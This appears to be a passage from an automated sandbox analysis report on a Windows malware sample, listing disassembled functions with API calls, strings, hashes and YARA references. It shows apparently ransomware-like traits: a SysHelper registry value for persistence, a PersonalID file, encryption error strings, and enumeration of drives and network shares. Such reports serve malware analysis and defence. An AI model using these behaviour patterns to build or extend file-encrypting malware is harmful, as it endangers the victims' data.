                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F117735A01209ABDB209BD59D88FEF7FACEF45791F040122FB08D2250D728D985CAA8
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0044F26C, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 0044F27F
                                                                                                                                                                                                        • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0044F294
                                                                                                                                                                                                        • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 0044F2AD
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0044F2C2
                                                                                                                                                                                                      • std::regex_error::regex_error.LIBCPMT ref: 0044F2D4
                                                                                                                                                                                                        • Part of subcall function 0044EF74: std::exception::exception.LIBCMT ref: 0044EF8E
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0044F2E2
                                                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 0044F2FB
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0044F310
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                                                                                                                                                                                                      • String ID: bad function call
                                                                                                                                                                                                      • API String ID: 2464034642-3612616537
                                                                                                                                                                                                      • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                                                                                                                      • Instruction ID: b7a33952e270e61bb8336860f47bfa26d0287e47148adb1a9e07c7a629f44a3a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 60110A74D0020DBBCB04FFA5D566CDDBB7CEA04348F408A67BD2497241EB78A7498B99
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040C740, Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 254COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00420FDD: __wfsopen.LIBCMT ref: 00420FE8
                                                                                                                                                                                                      • _fgetws.LIBCMT ref: 0040C7BC
                                                                                                                                                                                                      • _memmove.LIBCMT ref: 0040C89F
                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateDirectory__wfsopen_fgetws_memmove
                                                                                                                                                                                                      • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                                                                                                                      • API String ID: 2864494435-54166481
                                                                                                                                                                                                      • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                                                                                                                      • Instruction ID: 3a80d152ee3a33a632d987be3a831cd6f981e29f6d1810208bb328cacc5ceb60
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 449193B2E00219DBCF20DFA5D9857AFB7B5AF04304F54463BE805B3281E7799A44CB99
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040F310, Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 311libraryloaderCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(Shell32.dll), ref: 0040F338
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040F353
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                      • String ID: SHGetFolderPathW$Shell32.dll$\
                                                                                                                                                                                                      • API String ID: 2574300362-2555811374
                                                                                                                                                                                                      • Opcode ID: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
                                                                                                                                                                                                      • Instruction ID: 879cb2c41796572bb27552663435674e3d239ec9c812fe4031d18dca963833e9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DFC15A70D00209EBDF10DFA4DD85BDEBBB5AF14308F10443AE405B7291EB79AA59CB99
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040CBA0, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 240COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _malloc$__except_handler4_fprintf
                                                                                                                                                                                                      • String ID: &#160;$Error encrypting message: %s$\\n
                                                                                                                                                                                                      • API String ID: 1783060780-3771355929
                                                                                                                                                                                                      • Opcode ID: 03c951cbcffbb22e4b904cab30c58fb638dd7e4556e50294ac70ee7de3450d71
                                                                                                                                                                                                      • Instruction ID: bc568b6946d652cfd5b4c77746d66a5f57144f99ddafb1662d710ebef24806c3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 03c951cbcffbb22e4b904cab30c58fb638dd7e4556e50294ac70ee7de3450d71
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 10A196B1C00249EBEF10EF95DD46BDEBB75AF10308F54052DE40576282D7BA5688CBAA
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00463350, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 148COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _strncmp
                                                                                                                                                                                                      • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                                                                                                                                                                                                      • API String ID: 909875538-2908105608
                                                                                                                                                                                                      • Opcode ID: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                                                                                                                                                                                                      • Instruction ID: 5da15f4c8f0622be9955200bbf206a62195e74188b9aea783317ae4bc8ba6fc6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7413EA1BC83C129F721592ABC03F9763854B51B17F080467FA88E52C3FB9D8987419F
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 004C5D39, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 100COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __getptd_noexit.LIBCMT ref: 004C5D3D
                                                                                                                                                                                                        • Part of subcall function 0042501F: GetLastError.KERNEL32(?,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425021
                                                                                                                                                                                                        • Part of subcall function 0042501F: __calloc_crt.LIBCMT ref: 00425042
                                                                                                                                                                                                        • Part of subcall function 0042501F: __initptd.LIBCMT ref: 00425064
                                                                                                                                                                                                        • Part of subcall function 0042501F: GetCurrentThreadId.KERNEL32 ref: 0042506B
                                                                                                                                                                                                        • Part of subcall function 0042501F: SetLastError.KERNEL32(00000000,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425083
                                                                                                                                                                                                      • __calloc_crt.LIBCMT ref: 004C5D60
                                                                                                                                                                                                      • __get_sys_err_msg.LIBCMT ref: 004C5D7E
                                                                                                                                                                                                      • __invoke_watson.LIBCMT ref: 004C5D9B
                                                                                                                                                                                                      • __get_sys_err_msg.LIBCMT ref: 004C5DCD
                                                                                                                                                                                                      • __invoke_watson.LIBCMT ref: 004C5DEB
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004C5D48, 004C5D6E
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorLast__calloc_crt__get_sys_err_msg__invoke_watson$CurrentThread__getptd_noexit__initptd
                                                                                                                                                                                                      • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                                                                                                                                      • API String ID: 2139067377-798102604
                                                                                                                                                                                                      • Opcode ID: cd8e1f0d25954be7587d55b2fdc1dfd6ff928078fe4f34d2f7ed8acf51f870de
                                                                                                                                                                                                      • Instruction ID: efefb7cdb09aa89a66c944e42d5018451410fe076c3b278b171ca9447b521f4c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: cd8e1f0d25954be7587d55b2fdc1dfd6ff928078fe4f34d2f7ed8acf51f870de
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E11E935601F2567D7613A66AC05FBF738CDF007A4F50806FFE0696241E629AC8042AD
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040C6A0, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 0040C6C2
                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0040C700
                                                                                                                                                                                                      • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0040C725
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0040C72E
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseValue$OpenQuery
                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                                                                                                                                                                                                      • API String ID: 3962714758-1667468722
                                                                                                                                                                                                      • Opcode ID: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                                                                                                                                                                                                      • Instruction ID: 83d53c3b81c5c3826f22504a9cab54a14a7287ca0244f3776693af22b4817dfa
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 60112D7594020CFBDB109F91CC86FEEBB78EB04708F2041A5FA04B22A1D7B55B14AB58
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 004573F0, Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 251COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __aulldvrm
                                                                                                                                                                                                      • String ID: $+$0123456789ABCDEF$0123456789abcdef$UlE
                                                                                                                                                                                                      • API String ID: 1302938615-3129329331
                                                                                                                                                                                                      • Opcode ID: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
                                                                                                                                                                                                      • Instruction ID: ba297de4fec08f8b73c8771b24cc4328c1ae3ea447eff3a94226dc6813255680
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D181AEB1A087509FD710CF29A84062BBBE5BFC9755F15092EFD8593312E338DD098B96
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00411B10, Relevance: 10.6, APIs: 7, Instructions: 50timewindowsleepCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: MessageTimetime$Peek$DispatchSleep
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3697694649-0
                                                                                                                                                                                                      • Opcode ID: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                                                                                                                                                                                                      • Instruction ID: 47d0c5dc5d1eae46eaa001befe89e32fbe66e83151f6641dec248f991c3ab793
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE017532A40319A6DB2097E59C81FEEB768AB44B40F044066FB04A71D0E664A9418BA9
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 004506A0, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 119COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • ___from_strstr_to_strchr.LIBCMT ref: 004507C3
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ___from_strstr_to_strchr
                                                                                                                                                                                                      • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                                                                                                                                                                                      • API String ID: 601868998-2416195885
                                                                                                                                                                                                      • Opcode ID: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
                                                                                                                                                                                                      • Instruction ID: 4fd155d7ac4cfc4ad9107eba643b63d3b81161049ee91e28a54c83c9030a6459
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F64109756043055BDB20EE25CC45BAFB7D8EF85309F40082FF98593242E679E90C8B96
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0045AE30, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _memset
                                                                                                                                                                                                      • String ID: .\crypto\buffer\buffer.c$g9F
                                                                                                                                                                                                      • API String ID: 2102423945-3653307630
                                                                                                                                                                                                      • Opcode ID: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                                                                                                                                                                                                      • Instruction ID: 958ac6a2dbe7618ecd56aaf11cdfe4c63fb5daf7b6a990d4d23814bb8d8bf6ac
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 27212BB6B403213FE210665DFC43B66B399EB84B15F10413BF618D73C2D6A8A865C3D9
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00425341, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _wcsnlen
                                                                                                                                                                                                      • String ID: U
                                                                                                                                                                                                      • API String ID: 3628947076-3372436214
                                                                                                                                                                                                      • Opcode ID: b6ca082fea440d1ca5cff6801f17e255d65e87a8c4bbbad4e9973a502f76dbd1
                                                                                                                                                                                                      • Instruction ID: 96f9a77ca4cc4fe958c434aa827cb810c13d5acf0ea92317e974609e7887e837
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6ca082fea440d1ca5cff6801f17e255d65e87a8c4bbbad4e9973a502f76dbd1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6521C9717046286BEB10DAA5BC41BBB739CDB85750FD0416BFD08C6190EA79994046AD
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00462FF0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 83COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _fprintf_memset
                                                                                                                                                                                                      • String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
                                                                                                                                                                                                      • API String ID: 3021507156-3399676524
                                                                                                                                                                                                      • Opcode ID: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
                                                                                                                                                                                                      • Instruction ID: 90c6fe5d672865ace0ee8fbe81ed9b43ee89a432c17a94ace257beddb0b51c59
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0E218B72B043513BE720AD22AC01FBB7799CFC179DF04441AFA54672C6E639ED0942AA
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040C500, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
                                                                                                                                                                                                      • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C539
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Path$AppendFolder
                                                                                                                                                                                                      • String ID: bowsakkdestx.txt
                                                                                                                                                                                                      • API String ID: 29327785-2616962270
                                                                                                                                                                                                      • Opcode ID: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
                                                                                                                                                                                                      • Instruction ID: a05810460da3035b09b2d6f50620da2975429261b58b3288bff945a9ad0f9da5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 281127B2B4023833D930756A7C87FEB735C9B42725F4001B7FE0CA2182A5AE554501E9
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0041BA80, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateWindowExW.USER32 ref: 0041BAAD
                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 0041BABE
                                                                                                                                                                                                      • UpdateWindow.USER32(00000000), ref: 0041BAC5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$CreateShowUpdate
                                                                                                                                                                                                      • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                                                                                                                                                                                                      • API String ID: 2944774295-3503800400
                                                                                                                                                                                                      • Opcode ID: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                                                                                                                                                                                                      • Instruction ID: 93e3ae8c3ab6e4512016b3ef7200399996c0305a41779b72c5d02abe3f8cd5ff
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08E04F316C172077E3715B15BC5BFDA2918FB05F10F308119FA14792E0C6E569428A8C
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00410BD0, Relevance: 7.7, APIs: 5, Instructions: 234sharememoryCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00410C12
                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00004000,?,?), ref: 00410C39
                                                                                                                                                                                                      • _memset.LIBCMT ref: 00410C4C
                                                                                                                                                                                                      • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00410C63
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Enum$AllocGlobalOpenResource_memset
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 364255426-0
                                                                                                                                                                                                      • Opcode ID: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
                                                                                                                                                                                                      • Instruction ID: bd97fe2cb621df6ca28f66a093f1f6e361520364a30ff1ea4190286e2c40543e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F91B2756083418FD724DF55D891BABB7E1FF84704F14891EE48A87380E7B8A981CB5A
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00410A50, Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetLogicalDrives.KERNEL32 ref: 00410A75
                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
                                                                                                                                                                                                      • PathFileExistsA.SHLWAPI(?), ref: 00410AF9
                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000), ref: 00410B02
                                                                                                                                                                                                      • GetDriveTypeA.KERNEL32(?), ref: 00410B1B
                                                                                                                                                                                                      Memory Dump Source
